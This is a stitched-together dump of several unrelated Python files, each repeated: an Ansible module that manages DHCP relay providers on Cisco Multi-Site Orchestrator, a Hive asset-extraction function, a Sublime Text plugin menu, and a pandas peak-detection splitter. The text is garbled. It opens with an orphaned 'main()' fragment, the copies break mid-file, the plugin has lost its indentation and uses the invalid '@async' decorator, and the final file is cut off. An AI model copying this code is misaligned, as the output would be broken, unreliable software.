if __name__ == "__main__":
main() | intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/cisco/mso/plugins/modules/mso_dhcp_relay_policy_provider.py |
# Copyright: (c) 2020, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: mso_dhcp_relay_policy_provider
short_description: Manage DHCP providers in a DHCP Relay policy.
description:
- Manage DHCP providers in a DHCP Relay policy on Cisco Multi-Site Orchestrator.
author:
- <NAME> (@jorgegome2307)
options:
dhcp_relay_policy:
description:
- Name of the DHCP Relay Policy
type: str
required: yes
aliases: [ name ]
ip:
description:
- IP address of the DHCP Server
type: str
tenant:
description:
- Tenant where the DHCP provider is located.
type: str
schema:
description:
- Schema where the DHCP provider is configured
type: str
template:
description:
- template where the DHCP provider is configured
type: str
application_profile:
description:
- Application Profile where the DHCP provider is configured
type: str
aliases: [ anp ]
endpoint_group:
description:
- EPG where the DHCP provider is configured
type: str
aliases: [ epg ]
external_endpoint_group:
description:
- External EPG where the DHCP provider is configured
type: str
aliases: [ ext_epg, external_epg ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: cisco.mso.modules
"""
EXAMPLES = r"""
- name: Add a new provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: present
delegate_to: localhost
- name: Remove a provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: absent
delegate_to: localhost
- name: Query a provider to a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
tenant: ansible_test
schema: ansible_test
template: Template 1
application_profile: ansible_test
endpoint_group: ansible_test
state: query
delegate_to: localhost
- name: Query all provider of a DHCP Relay Policy
cisco.mso.mso_dhcp_relay_policy_provider:
host: mso_host
username: admin
password: <PASSWORD>
dhcp_relay_policy: my_test_dhcp_policy
state: query
delegate_to: localhost
"""
RETURN = r"""
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.mso.plugins.module_utils.mso import (
MSOModule,
mso_argument_spec,
)
def main():
    """Ansible entry point: add/remove/query one DHCP provider entry inside an
    MSO DHCP Relay policy by PUT-ing the whole, modified policy object back."""
    argument_spec = mso_argument_spec()
    argument_spec.update(
        dhcp_relay_policy=dict(type="str", required=True, aliases=['name']),
        ip=dict(type="str"),
        tenant=dict(type="str"),
        schema=dict(type="str"),
        template=dict(type="str"),
        application_profile=dict(type="str", aliases=['anp']),
        endpoint_group=dict(type="str", aliases=['epg']),
        external_endpoint_group=dict(type="str", aliases=['ext_epg', 'external_epg']),
        state=dict(type="str", default="present", choices=["absent", "present", "query"]),
    )
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        # ip is only required when creating; removal just has to locate the entry.
        required_if=[
            ["state", "present", ["ip", "tenant", "schema", "template"]],
            ["state", "absent", ["tenant", "schema", "template"]],
        ],
    )
    dhcp_relay_policy = module.params.get("dhcp_relay_policy")
    ip = module.params.get("ip")
    tenant = module.params.get("tenant")
    schema = module.params.get("schema")
    template = module.params.get("template")
    if template is not None:
        # MSO reference paths embed the template name without spaces.
        template = template.replace(' ', '')
    application_profile = module.params.get("application_profile")
    endpoint_group = module.params.get("endpoint_group")
    external_endpoint_group = module.params.get("external_endpoint_group")
    state = module.params.get("state")
    mso = MSOModule(module)
    path = "policies/dhcp/relay"
    tenant_id = mso.lookup_tenant(tenant)
    schema_id = mso.lookup_schema(schema)
    # Provider payload skeleton; exactly one of epgRef/externalEpgRef is filled below.
    provider = dict(
        addr=ip,
        externalEpgRef='',
        epgRef='',
        l3Ref='',
        tenantId=tenant_id,
    )
    provider_index = None
    previous_provider = {}
    if application_profile is not None and endpoint_group is not None:
        provider['epgRef'] = '/schemas/{schemaId}/templates/{templateName}/anps/{app}/epgs/{epg}'.format(
            schemaId=schema_id, templateName=template, app=application_profile, epg=endpoint_group,
        )
    elif external_endpoint_group is not None:
        provider['externalEpgRef'] = '/schemas/{schemaId}/templates/{templateName}/externalEpgs/{ext_epg}'.format(
            schemaId=schema_id, templateName=template, ext_epg=external_endpoint_group
        )
    # Query for existing object(s)
    dhcp_relay_obj = mso.get_obj(path, name=dhcp_relay_policy, key="DhcpRelayPolicies")
    if 'id' not in dhcp_relay_obj:
        mso.fail_json(msg="DHCP Relay Policy '{0}' is not a valid DHCP Relay Policy name.".format(dhcp_relay_policy))
    policy_id = dhcp_relay_obj.get("id")
    providers = []
    if "provider" in dhcp_relay_obj:
        providers = dhcp_relay_obj.get('provider')
        # Locate an existing entry pointing at the same EPG / external EPG.
        for index, prov in enumerate(providers):
            if (
                (provider.get('epgRef') != '' and prov.get('epgRef') == provider.get('epgRef'))
                or (provider.get('externalEpgRef') != '' and prov.get('externalEpgRef') == provider.get('externalEpgRef'))
            ):
                previous_provider = prov
                provider_index = index
    # If we found an existing object, continue with it
    path = '{0}/{1}'.format(path, policy_id)
    if state == "query":
        mso.existing = providers
        if endpoint_group is not None or external_endpoint_group is not None:
            # A specific provider was requested: return only the match (or {}).
            mso.existing = previous_provider
        mso.exit_json()
    if endpoint_group is None and external_endpoint_group is None:
        mso.fail_json(msg="Missing either endpoint_group or external_endpoint_group required attribute.")
    mso.previous = previous_provider
    if state == "absent":
        provider = {}
        if previous_provider:
            if provider_index is not None:
                providers.pop(provider_index)
    elif state == "present":
        if provider_index is not None:
            # Replace the matching entry in place.
            providers[provider_index] = provider
        else:
            providers.append(provider)
    if module.check_mode:
        # Check mode: report the would-be provider ({} for a removal)
        # without touching the API.
        mso.existing = provider
    else:
        mso.existing = dhcp_relay_obj
        dhcp_relay_obj["provider"] = providers
        mso.sanitize(dhcp_relay_obj, collate=True)
        # The relay-policy API has no per-provider endpoint; PUT the whole policy.
        new_dhcp_relay_obj = mso.request(path, method="PUT", data=mso.sent)
        mso.existing = {}
        # Echo back the provider as stored server-side (stays {} after removal).
        for index, prov in enumerate(new_dhcp_relay_obj.get('provider')):
            if (
                (provider.get('epgRef') != '' and prov.get('epgRef') == provider.get('epgRef'))
                or (provider.get('externalEpgRef') != '' and prov.get('externalEpgRef') == provider.get('externalEpgRef'))
            ):
                mso.existing = prov
    mso.exit_json()
if __name__ == "__main__":
main() | 0.772874 | 0.236373 |
import logging
from kazoo.client import KazooClient
from full_incidents.hive_to_dwh.hive_connector import create_hive_connector
logger = logging.getLogger('hive_to_dwh')
def extract(hive_settings, zookeeper_settings, extraction_start_date):
    """Pull asset rows (collector / event-source / source / destination hosts)
    from the Hive ``normalized`` table for a single day partition.

    Args:
        hive_settings: dict with Hive connection data (``user``, ``domain``,
            ``keytab``, ...); ``host``/``port`` are filled in from ZooKeeper.
        zookeeper_settings: ZooKeeper hosts string used for service discovery.
        extraction_start_date: date-like object whose day/month/year select
            the partition to read.

    Returns:
        Tuple ``(assets, sys_date)``: a list of row dicts keyed by bare
        column name, and the partition keys that were used.
    """
    # Discover a live HiveServer2 instance via ZooKeeper.  Children look like
    # "serverUri=host:port;version=...;sequence=..."; the last child wins.
    zk = KazooClient(
        hosts=zookeeper_settings)
    zk.start(timeout=5)
    for hiveserver2 in zk.get_children(path='hiveserver2'):
        host_port = hiveserver2.split(';')[0].split('=')[1].split(':')
        hive_settings["host"] = host_port[0]
        hive_settings["port"] = host_port[1]
    # Obtain a Kerberos ticket for the Hive principal before connecting.
    # (Restored from anonymization-garbled text: "{user}@{domain}".format(...).)
    login = "{user}@{domain}".format(user=hive_settings['user'], domain=hive_settings['domain'])
    command = "/usr/bin/kinit -k -t {keytab} {user}".format(keytab=hive_settings['keytab'], user=login)
    import subprocess  # local import kept so module-level imports stay untouched
    process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
    process.communicate()  # wait for kinit to finish
    # Partition keys of the day being extracted.
    sys_date = {}
    sys_date["sys_day"] = extraction_start_date.day
    sys_date["sys_month"] = extraction_start_date.month
    sys_date["sys_year"] = extraction_start_date.year
    hive_connector = create_hive_connector(hive_settings)
    cursor = hive_connector.create()
    # Four role-specific projections of the same partition, unioned into one
    # host/asset list.  (The table name is a fixed literal, so the previous
    # f-string interpolation of {"normalized"} was removed.)
    cursor.execute(
        """
        SELECT collector_location_fqdn as fqdn, collector_location_hostname as hostname,
        collector_location_ip as ip, collector_organization as organization,
        '' as title, true as is_collector, false as isnetworklocal,
        false as is_source, false as is_eventsource
        FROM normalized
        WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
        AND (collector_location_hostname is not NULL OR collector_location_ip is not NULL)
        AND collector_organization is not NULL
        UNION
        SELECT eventsource_location_fqdn as fqdn, eventsource_location_hostname as hostname, eventsource_location_ip as ip,
        sys_org as organization, eventsource_title as title,
        false as is_collector, false as isnetworklocal, false as is_source, true as is_eventsource
        FROM normalized
        WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
        AND (eventsource_location_hostname is not NULL OR eventsource_location_ip is not NULL) AND sys_org is not NULL
        UNION
        SELECT source_fqdn as fqdn, source_hostname as hostname, source_ip as ip, sys_org as organization,
        '' as title, false as is_collector,
        source_enrichment_isnetworklocal as isnetworklocal, true as is_source, false as is_eventsource
        FROM normalized
        WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
        AND (source_hostname is not NULL OR source_ip is not NULL) AND sys_org is not NULL
        UNION
        SELECT destination_fqdn as fqdn, destination_hostname as hostname, destination_ip as ip, sys_org as organization,
        '' as title, false as is_collector,
        false as isnetworklocal, false as is_source, false as is_eventsource
        FROM normalized
        WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
        AND (destination_hostname is not NULL OR destination_ip is not NULL) AND sys_org is not NULL
        AND destination_enrichment_isnetworklocal=true
        """,
        parameters={'extraction_start_year': sys_date["sys_year"],
                    'extraction_start_month': sys_date["sys_month"],
                    'extraction_start_day': sys_date["sys_day"]}
    )
    raws = cursor.fetchall()
    # Hive reports qualified names ("table.column"); keep the bare column part.
    fields = [field[0].split('.')[1] for field in cursor.description]
    # Consistency fix: use the module logger instead of the root logger.
    logger.info("Size of data extracted from the hive: %d", len(raws))
    assets = [dict(zip(fields, raw)) for raw in raws]
    cursor.close()
    return assets, sys_date
from kazoo.client import KazooClient
from full_incidents.hive_to_dwh.hive_connector import create_hive_connector
logger = logging.getLogger('hive_to_dwh')
def extract(hive_settings, zookeeper_settings, extraction_start_date):
    """Pull asset rows (collector / event-source / source / destination hosts)
    from the Hive ``normalized`` table for a single day partition.

    Args:
        hive_settings: dict with Hive connection data (``user``, ``domain``,
            ``keytab``, ...); ``host``/``port`` are filled in from ZooKeeper.
        zookeeper_settings: ZooKeeper hosts string used for service discovery.
        extraction_start_date: date-like object whose day/month/year select
            the partition to read.

    Returns:
        Tuple ``(assets, sys_date)``: a list of row dicts keyed by bare
        column name, and the partition keys that were used.
    """
    # Discover a live HiveServer2 instance via ZooKeeper.  Children look like
    # "serverUri=host:port;version=...;sequence=..."; the last child wins.
    zk = KazooClient(
        hosts=zookeeper_settings)
    zk.start(timeout=5)
    for hiveserver2 in zk.get_children(path='hiveserver2'):
        host_port = hiveserver2.split(';')[0].split('=')[1].split(':')
        hive_settings["host"] = host_port[0]
        hive_settings["port"] = host_port[1]
    # Obtain a Kerberos ticket for the Hive principal before connecting.
    # (Restored from anonymization-garbled text: "{user}@{domain}".format(...).)
    login = "{user}@{domain}".format(user=hive_settings['user'], domain=hive_settings['domain'])
    command = "/usr/bin/kinit -k -t {keytab} {user}".format(keytab=hive_settings['keytab'], user=login)
    import subprocess  # local import kept so module-level imports stay untouched
    process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
    process.communicate()  # wait for kinit to finish
    # Partition keys of the day being extracted.
    sys_date = {}
    sys_date["sys_day"] = extraction_start_date.day
    sys_date["sys_month"] = extraction_start_date.month
    sys_date["sys_year"] = extraction_start_date.year
    hive_connector = create_hive_connector(hive_settings)
    cursor = hive_connector.create()
    # Four role-specific projections of the same partition, unioned into one
    # host/asset list.  (The table name is a fixed literal, so the previous
    # f-string interpolation of {"normalized"} was removed.)
    cursor.execute(
        """
        SELECT collector_location_fqdn as fqdn, collector_location_hostname as hostname,
        collector_location_ip as ip, collector_organization as organization,
        '' as title, true as is_collector, false as isnetworklocal,
        false as is_source, false as is_eventsource
        FROM normalized
        WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
        AND (collector_location_hostname is not NULL OR collector_location_ip is not NULL)
        AND collector_organization is not NULL
        UNION
        SELECT eventsource_location_fqdn as fqdn, eventsource_location_hostname as hostname, eventsource_location_ip as ip,
        sys_org as organization, eventsource_title as title,
        false as is_collector, false as isnetworklocal, false as is_source, true as is_eventsource
        FROM normalized
        WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
        AND (eventsource_location_hostname is not NULL OR eventsource_location_ip is not NULL) AND sys_org is not NULL
        UNION
        SELECT source_fqdn as fqdn, source_hostname as hostname, source_ip as ip, sys_org as organization,
        '' as title, false as is_collector,
        source_enrichment_isnetworklocal as isnetworklocal, true as is_source, false as is_eventsource
        FROM normalized
        WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
        AND (source_hostname is not NULL OR source_ip is not NULL) AND sys_org is not NULL
        UNION
        SELECT destination_fqdn as fqdn, destination_hostname as hostname, destination_ip as ip, sys_org as organization,
        '' as title, false as is_collector,
        false as isnetworklocal, false as is_source, false as is_eventsource
        FROM normalized
        WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
        AND (destination_hostname is not NULL OR destination_ip is not NULL) AND sys_org is not NULL
        AND destination_enrichment_isnetworklocal=true
        """,
        parameters={'extraction_start_year': sys_date["sys_year"],
                    'extraction_start_month': sys_date["sys_month"],
                    'extraction_start_day': sys_date["sys_day"]}
    )
    raws = cursor.fetchall()
    # Hive reports qualified names ("table.column"); keep the bare column part.
    fields = [field[0].split('.')[1] for field in cursor.description]
    # Consistency fix: use the module logger instead of the root logger.
    logger.info("Size of data extracted from the hive: %d", len(raws))
    assets = [dict(zip(fields, raw)) for raw in raws]
    cursor.close()
    return assets, sys_date
from .pepper import *
from .pepper_launch import *
from .pepper_quit import *
from .pepper_autocomplete import *
class PepperMainMenuCommand(sublime_plugin.ApplicationCommand):
def run(self):
main_menu_commands = [
PepperLaunchCommand,
PepperAutocomplete,
PepperQuitCommand
]
def filter_visible(cmd):
if not isinstance(cmd, tuple):
if cmd.visible():
return cmd
else:
return None
name, desc, submenu = cmd
submenu = [filter_visible(c) for c in submenu
if filter_visible(c)]
if submenu:
return name, desc, submenu
return None
main_menu_commands = [filter_visible(c) for c in main_menu_commands
if filter_visible(c)]
def select_command_func(commands):
def select_command(i):
if i < 0:
return
command = commands[i]
if isinstance(command, tuple):
name, desc, l = command
@async
def quick_panel():
sublime.active_window().show_quick_panel([
[command_name(item)] +
command_description(item).split("\n")
for item in l
], select_command_func(l))
quick_panel()
else:
cmd = command_str(command)
if issubclass(command, sublime_plugin.ApplicationCommand):
sublime.run_command(cmd)
elif issubclass(command, sublime_plugin.WindowCommand):
sublime.active_window().run_command(cmd)
elif issubclass(command, sublime_plugin.TextCommand):
sublime.active_window().active_view().run_command(cmd)
return select_command
def command_str(cls):
name = cls.__name__
return "pepper_" + name[18:-7].lower()
def command_name(cls):
if isinstance(cls, tuple):
name, desc, l = cls
return name
return cls.plugin_name
def command_description(cls):
if isinstance(cls, tuple):
name, desc, l = cls
return desc
return cls.plugin_description
sublime.active_window().show_quick_panel([
[command_name(cls)] + command_description(cls).split("\n")
for cls in main_menu_commands
], select_command_func(main_menu_commands)) | pepper_main_menu.py | from .pepper import *
from .pepper_launch import *
from .pepper_quit import *
from .pepper_autocomplete import *
class PepperMainMenuCommand(sublime_plugin.ApplicationCommand):
def run(self):
main_menu_commands = [
PepperLaunchCommand,
PepperAutocomplete,
PepperQuitCommand
]
def filter_visible(cmd):
if not isinstance(cmd, tuple):
if cmd.visible():
return cmd
else:
return None
name, desc, submenu = cmd
submenu = [filter_visible(c) for c in submenu
if filter_visible(c)]
if submenu:
return name, desc, submenu
return None
main_menu_commands = [filter_visible(c) for c in main_menu_commands
if filter_visible(c)]
def select_command_func(commands):
def select_command(i):
if i < 0:
return
command = commands[i]
if isinstance(command, tuple):
name, desc, l = command
@async
def quick_panel():
sublime.active_window().show_quick_panel([
[command_name(item)] +
command_description(item).split("\n")
for item in l
], select_command_func(l))
quick_panel()
else:
cmd = command_str(command)
if issubclass(command, sublime_plugin.ApplicationCommand):
sublime.run_command(cmd)
elif issubclass(command, sublime_plugin.WindowCommand):
sublime.active_window().run_command(cmd)
elif issubclass(command, sublime_plugin.TextCommand):
sublime.active_window().active_view().run_command(cmd)
return select_command
def command_str(cls):
name = cls.__name__
return "pepper_" + name[18:-7].lower()
def command_name(cls):
if isinstance(cls, tuple):
name, desc, l = cls
return name
return cls.plugin_name
def command_description(cls):
if isinstance(cls, tuple):
name, desc, l = cls
return desc
return cls.plugin_description
sublime.active_window().show_quick_panel([
[command_name(cls)] + command_description(cls).split("\n")
for cls in main_menu_commands
], select_command_func(main_menu_commands)) | 0.308607 | 0.04703 |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def split(
    df, cmpframe=0, distfactor=1.5, show=False, add_start=False, add_end=False
):
    """Cut *df* into consecutive segments at distance-signal valleys.

    A reference frame (row *cmpframe*, or the second-to-last row when
    cmpframe == -1) is compared against every row; valleys of the summed
    squared distance mark the segment boundaries.

    Returns a list of DataFrame slices, one per consecutive boundary pair.
    """
    reference = df[-2:-1] if cmpframe == -1 else df[cmpframe : cmpframe + 1]
    signal = dist(reference, df).sum(axis=1)
    boundaries = find_splits(signal, distfactor)
    if add_start:
        boundaries = np.append([0], boundaries)
    if add_end:
        boundaries = np.append(boundaries, [len(df) - 1])
    if show:
        # Visualize the distance signal together with the chosen cut points.
        plt.figure(figsize=(10, 4))
        plt.plot(signal)
        for boundary in boundaries:
            plt.axvline(boundary, c="red")
        plt.show()
    segments = []
    for left, right in zip(boundaries[:-1], boundaries[1:]):
        segments.append(df[left:right])
    return segments
def signal_of_split(
    df, cmpframe=0, distfactor=1.5, show=False, add_start=False, add_end=False
):
    """Return the distance signal and valley indices used by :func:`split`.

    Same boundary logic as ``split`` but returns ``(signal, valleys)``
    instead of DataFrame segments.  ``show`` is accepted for interface
    parity and has no effect here.
    """
    reference = df[-2:-1] if cmpframe == -1 else df[cmpframe : cmpframe + 1]
    signal = dist(reference, df).sum(axis=1)
    boundaries = find_splits(signal, distfactor)
    if add_start:
        boundaries = np.append([0], boundaries)
    if add_end:
        boundaries = np.append(boundaries, [len(df) - 1])
    return signal, boundaries
def dist(start, df):
    """Per-column squared difference between every row of *df* and the
    single-row frame *start*; returns a DataFrame shaped like *df*."""
    return pd.DataFrame(
        {column: (df[column] - start[column].values) ** 2 for column in df.columns}
    )
def get_frequency(signal):
    """Estimate the dominant frequency of *signal* from the FFT magnitude
    spectrum, searching bins 1..19 only (the DC component is ignored).

    NOTE(review): the returned value is the argmax *within* the slice
    ``ftabs[1:20]`` and is therefore one less than the actual FFT bin
    index; callers currently rely on this value, so it is preserved.
    """
    magnitudes = np.abs(np.fft.fft(signal))
    magnitudes[0] = 0  # drop DC (redundant with the slice below, kept for clarity)
    return np.argmax(magnitudes[1:20])
def find_splits(signal, distfactor=1.5):
    """Locate valleys of *signal* to use as split points.

    The FFT-based split-count estimate bounds how close two valleys may be
    (minimum peak distance) and the mean of the negated signal acts as the
    minimum valley depth.

    NOTE(review): a zero frequency estimate would raise ZeroDivisionError
    here -- confirm inputs are always periodic enough.
    """
    estimated_splits = get_frequency(signal)
    min_height = np.mean(-signal)
    min_distance = len(signal) / (distfactor * estimated_splits)
    return _detect_peaks(signal, mpd=min_distance, mph=min_height, valley=True)
def _detect_peaks(
    x,
    mph=None,
    mpd=1,
    threshold=0,
    edge="rising",
    kpsh=False,
    valley=False,
    show=False,
    ax=None,
):
    """Detect peaks in data based on their amplitude and other features.

    Parameters
    ----------
    x : 1D array_like
        data.
    mph : {None, number}, optional (default = None)
        detect peaks that are greater than minimum peak height.
    mpd : positive integer, optional (default = 1)
        detect peaks that are at least separated
        by minimum peak distance (in
        number of data).
    threshold : number, optional (default = 0)
        detect peaks that exceed their immediate neighbors by at least
        this amount.
    edge : {None, 'rising', 'falling', 'both'}, optional (default = 'rising')
        which edge(s) of a flat peak to keep; None rejects flat peaks.
    kpsh : bool, optional (default = False)
        keep peaks of equal height even when closer than `mpd`.
    valley : bool, optional (default = False)
        if True (1), detect valleys (local minima) instead of peaks.
    show : bool, optional (default = False)
        accepted for API compatibility; plotting is not implemented here.
    ax : a matplotlib.axes.Axes instance, optional (default = None).
        accepted for API compatibility; unused.

    Returns
    -------
    ind : 1D array_like
        indeces of the peaks in `x`.

    Notes
    -----
    The detection of valleys instead of peaks
    is performed internally by simply
    negating the data: `ind_valleys = detect_peaks(-x)`
    """
    x = np.atleast_1d(x).astype("float64")
    if x.size < 3:
        # Too short to contain an interior extremum.
        return np.array([], dtype=int)
    if valley:
        x = -x
    # find indices of all peaks
    dx = x[1:] - x[:-1]
    # handle NaN's
    indnan = np.where(np.isnan(x))[0]
    if indnan.size:
        x[indnan] = np.inf
        dx[np.where(np.isnan(dx))[0]] = np.inf
    ine, ire, ife = np.array([[], [], []], dtype=int)
    if not edge:
        # Strict local maxima only (no flat tops).
        ine = np.where((np.hstack((dx, 0)) < 0) & (np.hstack((0, dx)) > 0))[0]
    else:
        if edge.lower() in ["rising", "both"]:
            ire = np.where(
                (np.hstack((dx, 0)) <= 0) & (np.hstack((0, dx)) > 0)
            )[0]
        if edge.lower() in ["falling", "both"]:
            ife = np.where(
                (np.hstack((dx, 0)) < 0) & (np.hstack((0, dx)) >= 0)
            )[0]
    ind = np.unique(np.hstack((ine, ire, ife)))
    # handle NaN's
    if ind.size and indnan.size:
        # NaN's and values close to NaN's cannot be peaks
        ind = ind[
            np.in1d(
                ind,
                np.unique(np.hstack((indnan, indnan - 1, indnan + 1))),
                invert=True,
            )
        ]
    # first and last values of x cannot be peaks
    if ind.size and ind[0] == 0:
        ind = ind[1:]
    if ind.size and ind[-1] == x.size - 1:
        ind = ind[:-1]
    # remove peaks < minimum peak height
    if ind.size and mph is not None:
        ind = ind[x[ind] >= mph]
    # remove peaks - neighbors < threshold
    if ind.size and threshold > 0:
        dx = np.min(
            np.vstack([x[ind] - x[ind - 1], x[ind] - x[ind + 1]]), axis=0
        )
        ind = np.delete(ind, np.where(dx < threshold)[0])
    # detect small peaks closer than minimum peak distance
    if ind.size and mpd > 1:
        ind = ind[np.argsort(x[ind])][::-1]  # sort ind by peak height
        idel = np.zeros(ind.size, dtype=bool)
        for i in range(ind.size):
            if not idel[i]:
                # keep peaks with the same height if kpsh is True
                idel = idel | (ind >= ind[i] - mpd) & (ind <= ind[i] + mpd) & (
                    x[ind[i]] > x[ind] if kpsh else True
                )
                idel[i] = 0  # Keep current peak
        # remove the small peaks and sort back the indices by their occurrence
        ind = np.sort(ind[~idel])
    return ind
import numpy as np
import matplotlib.pyplot as plt
def split(
    df, cmpframe=0, distfactor=1.5, show=False, add_start=False, add_end=False
):
    """Cut *df* into consecutive segments at distance-signal valleys.

    A reference frame (row *cmpframe*, or the second-to-last row when
    cmpframe == -1) is compared against every row; valleys of the summed
    squared distance mark the segment boundaries.

    Returns a list of DataFrame slices, one per consecutive boundary pair.
    """
    reference = df[-2:-1] if cmpframe == -1 else df[cmpframe : cmpframe + 1]
    signal = dist(reference, df).sum(axis=1)
    boundaries = find_splits(signal, distfactor)
    if add_start:
        boundaries = np.append([0], boundaries)
    if add_end:
        boundaries = np.append(boundaries, [len(df) - 1])
    if show:
        # Visualize the distance signal together with the chosen cut points.
        plt.figure(figsize=(10, 4))
        plt.plot(signal)
        for boundary in boundaries:
            plt.axvline(boundary, c="red")
        plt.show()
    segments = []
    for left, right in zip(boundaries[:-1], boundaries[1:]):
        segments.append(df[left:right])
    return segments
def signal_of_split(
    df, cmpframe=0, distfactor=1.5, show=False, add_start=False, add_end=False
):
    """Return the distance signal and valley indices used by :func:`split`.

    Same boundary logic as ``split`` but returns ``(signal, valleys)``
    instead of DataFrame segments.  ``show`` is accepted for interface
    parity and has no effect here.
    """
    reference = df[-2:-1] if cmpframe == -1 else df[cmpframe : cmpframe + 1]
    signal = dist(reference, df).sum(axis=1)
    boundaries = find_splits(signal, distfactor)
    if add_start:
        boundaries = np.append([0], boundaries)
    if add_end:
        boundaries = np.append(boundaries, [len(df) - 1])
    return signal, boundaries
def dist(start, df):
    """Per-column squared difference between every row of *df* and the
    single-row frame *start*; returns a DataFrame shaped like *df*."""
    return pd.DataFrame(
        {column: (df[column] - start[column].values) ** 2 for column in df.columns}
    )
def get_frequency(signal):
    """Estimate the dominant frequency of *signal* from the FFT magnitude
    spectrum, searching bins 1..19 only (the DC component is ignored).

    NOTE(review): the returned value is the argmax *within* the slice
    ``ftabs[1:20]`` and is therefore one less than the actual FFT bin
    index; callers currently rely on this value, so it is preserved.
    """
    magnitudes = np.abs(np.fft.fft(signal))
    magnitudes[0] = 0  # drop DC (redundant with the slice below, kept for clarity)
    return np.argmax(magnitudes[1:20])
def find_splits(signal, distfactor=1.5):
    """Locate valleys of *signal* to use as split points.

    The FFT-based split-count estimate bounds how close two valleys may be
    (minimum peak distance) and the mean of the negated signal acts as the
    minimum valley depth.

    NOTE(review): a zero frequency estimate would raise ZeroDivisionError
    here -- confirm inputs are always periodic enough.
    """
    estimated_splits = get_frequency(signal)
    min_height = np.mean(-signal)
    min_distance = len(signal) / (distfactor * estimated_splits)
    return _detect_peaks(signal, mpd=min_distance, mph=min_height, valley=True)
def _detect_peaks(
    x,
    mph=None,
    mpd=1,
    threshold=0,
    edge="rising",
    kpsh=False,
    valley=False,
    show=False,
    ax=None,
):
    """Detect peaks in data based on their amplitude and other features.
    Parameters
    ----------
    x : 1D array_like
        data.
    mph : {None, number}, optional (default = None)
        detect peaks that are greater than minimum peak height.
    mpd : positive integer, optional (default = 1)
        detect peaks that are at least separated
        by minimum peak distance (in
        number of data).
    threshold : number, optional (default = 0)
        detect peaks that exceed both immediate neighbors by at least
        `threshold`.
    edge : {None, 'rising', 'falling', 'both'}, optional (default = 'rising')
        which edge(s) of a flat-topped peak to report; None detects only
        strict local maxima.
    kpsh : bool, optional (default = False)
        keep peaks of the same height even when closer than `mpd`.
    valley : bool, optional (default = False)
        if True (1), detect valleys (local minima) instead of peaks.
    show : bool, optional (default = False)
        if True (1), plot data in matplotlib figure.
    ax : a matplotlib.axes.Axes instance, optional (default = None).
    Returns
    -------
    ind : 1D array_like
        indeces of the peaks in `x`.
    Notes
    -----
    The detection of valleys instead of peaks
    is performed internally by simply
    negating the data: `ind_valleys = detect_peaks(-x)`
    """
    x = np.atleast_1d(x).astype("float64")
    if x.size < 3:
        # Too short to contain an interior peak.
        return np.array([], dtype=int)
    if valley:
        x = -x
    # find indices of all peaks
    dx = x[1:] - x[:-1]
    # handle NaN's
    indnan = np.where(np.isnan(x))[0]
    if indnan.size:
        # Replace NaNs with Inf so they never satisfy the peak conditions.
        x[indnan] = np.inf
        dx[np.where(np.isnan(dx))[0]] = np.inf
    ine, ire, ife = np.array([[], [], []], dtype=int)
    if not edge:
        # Strict local maxima only (flat tops are ignored).
        ine = np.where((np.hstack((dx, 0)) < 0) & (np.hstack((0, dx)) > 0))[0]
    else:
        # '<=' / '>=' admit the rising/falling edge of flat-topped peaks.
        if edge.lower() in ["rising", "both"]:
            ire = np.where(
                (np.hstack((dx, 0)) <= 0) & (np.hstack((0, dx)) > 0)
            )[0]
        if edge.lower() in ["falling", "both"]:
            ife = np.where(
                (np.hstack((dx, 0)) < 0) & (np.hstack((0, dx)) >= 0)
            )[0]
    ind = np.unique(np.hstack((ine, ire, ife)))
    # handle NaN's
    if ind.size and indnan.size:
        # NaN's and values close to NaN's cannot be peaks
        ind = ind[
            np.in1d(
                ind,
                np.unique(np.hstack((indnan, indnan - 1, indnan + 1))),
                invert=True,
            )
        ]
    # first and last values of x cannot be peaks
    if ind.size and ind[0] == 0:
        ind = ind[1:]
    if ind.size and ind[-1] == x.size - 1:
        ind = ind[:-1]
    # remove peaks < minimum peak height
    if ind.size and mph is not None:
        ind = ind[x[ind] >= mph]
    # remove peaks - neighbors < threshold
    if ind.size and threshold > 0:
        dx = np.min(
            np.vstack([x[ind] - x[ind - 1], x[ind] - x[ind + 1]]), axis=0
        )
        ind = np.delete(ind, np.where(dx < threshold)[0])
    # detect small peaks closer than minimum peak distance
    if ind.size and mpd > 1:
        # Process tallest peaks first so that each kept peak suppresses its
        # smaller neighbors within +/- mpd samples.
